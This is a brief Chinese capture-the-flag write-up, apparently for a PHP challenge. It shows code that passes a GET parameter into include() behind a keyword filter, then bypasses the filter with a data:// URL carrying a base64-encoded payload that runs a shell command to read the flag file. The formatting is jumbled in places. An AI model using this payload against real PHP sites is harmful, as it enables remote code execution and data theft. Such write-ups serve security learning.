1. 代码审计
      ```php <?php //flag in flag.php error_reporting(0); if(isset($_GET[‘c’])){ $c = $_GET[‘c’]; if(!preg_match(“/flag|php|file/i”, $c)) //这里增加了对php,file过滤 {

      1. include($c);
      2. echo $flag;

      }

    }else{ highlightfile(_FILE); }

    2. 2.  利用`data`伪协议进行读取,因为同时对`php`进行了过滤,要用`base64`加密  
    3. ```shell
    4. <?php system('tac flag*')?>
    5. #base64加密后
    6. ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZyonKTs/Pg==
    8. #有些执行出来是空白,可以命令后面加入echo 1;试试
    9. #例如<?php phpinfo();echo 1;?>